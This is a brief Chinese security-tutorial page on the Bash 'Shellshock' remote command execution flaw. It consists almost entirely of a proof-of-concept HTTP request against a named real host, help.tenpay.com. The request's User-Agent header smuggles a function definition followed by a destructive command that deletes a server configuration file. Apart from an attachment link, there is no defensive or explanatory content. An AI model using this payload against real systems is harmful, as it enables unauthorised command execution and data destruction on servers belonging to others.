Bash远程解析命令执行漏洞测试方法
更新:HHH   时间:2023-1-7


漏洞利用POC:

GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1

Host: help.tenpay.com 

User-Agent: () { :;}; /bin/rm ./conf/test.xml

Accept: */*

Connection: keep-alive



附件:http://down.51cto.com/data/2368439
返回安全技术教程...